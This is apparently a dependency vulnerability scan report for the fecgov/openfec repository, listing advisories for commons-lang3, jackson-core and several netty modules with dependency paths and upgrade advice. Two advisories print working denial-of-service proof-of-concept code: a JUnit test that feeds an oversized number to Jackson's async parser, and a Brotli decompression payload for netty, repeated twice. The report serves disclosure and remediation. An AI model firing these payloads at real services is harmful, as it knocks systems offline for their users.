Vulnerabilities	13 via 127 paths
Dependencies	217
Source	GitHub
Commit	ca7f6a68

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Issue type

Vulnerabilities
13
License issues
6

Severity

Critical
High
10
Medium
8
Low
1

Status

Open
19
Patched
0
Ignored
0

high severity

Uncontrolled Recursion

Vulnerable module: org.apache.commons:commons-lang3
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.ing.data:cassandra-jdbc-wrapper@4.13.0 › org.apache.commons:commons-lang3@3.15.0
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.apache.commons:commons-text@1.10.0 › org.apache.commons:commons-lang3@3.15.0

Overview

Affected versions of this package are vulnerable to Uncontrolled Recursion via the ClassUtils.getClass function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.

Remediation

Upgrade org.apache.commons:commons-lang3 to version 3.18.0 or higher.

References

Uncontrolled Recursion vulnerability report

high severity

new

Allocation of Resources Without Limits or Throttling

Vulnerable module: com.fasterxml.jackson.core:jackson-core
Introduced through: com.fasterxml.jackson.core:jackson-core@2.17.2, com.fasterxml.jackson.core:jackson-databind@2.17.2 and others

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › com.fasterxml.jackson.core:jackson-core@2.17.2

Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.18.6.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › com.fasterxml.jackson.core:jackson-databind@2.17.2 › com.fasterxml.jackson.core:jackson-core@2.17.2

Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.18.6.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.ing.data:cassandra-jdbc-wrapper@4.13.0 › com.fasterxml.jackson.core:jackson-core@2.17.2

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

HTTP Request Smuggling

Vulnerable module: io.netty:netty-codec-http
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.33.13.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.33.13.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling via the parsing of chunk extensions in HTTP/1.1 messages with chunked encoding. An attacker can bypass HTTP request boundaries by sending specially crafted HTTP requests that exploit differences in how standalone newline characters are parsed between reverse proxies and the backend, potentially allowing them to smuggle additional requests.

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final, 4.2.5.Final or higher.

References

HTTP Request Smuggling vulnerability report

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Vulnerable module: io.netty:netty-codec-http
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.33.13.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.33.13.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final or higher.

References

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: io.netty:netty-codec-http2
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.32.33.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the improper handling of concurrently active streams per connection. An attacker can cause resource exhaustion and disrupt service availability by rapidly sending crafted frames, such as WINDOW_UPDATE, HEADERS, or PRIORITY, that manipulate the server's stream reset logic, leading to unbounded concurrent stream processing.

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.124.Final, 4.2.4.Final or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Vulnerable module: io.netty:netty-codec-http2
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.33.13.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.125.Final or higher.

References

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity

Improper Validation of Specified Quantity in Input

Vulnerable module: io.netty:netty-handler
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.32.33.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.0.3.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.ing.data:cassandra-jdbc-wrapper@4.13.0 › org.apache.cassandra:java-driver-core@4.18.1 › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.0.3.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.0.3.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.0.3.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.0.3.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-resolver-dns@4.1.112.Final › io.netty:netty-handler@4.1.94.Final
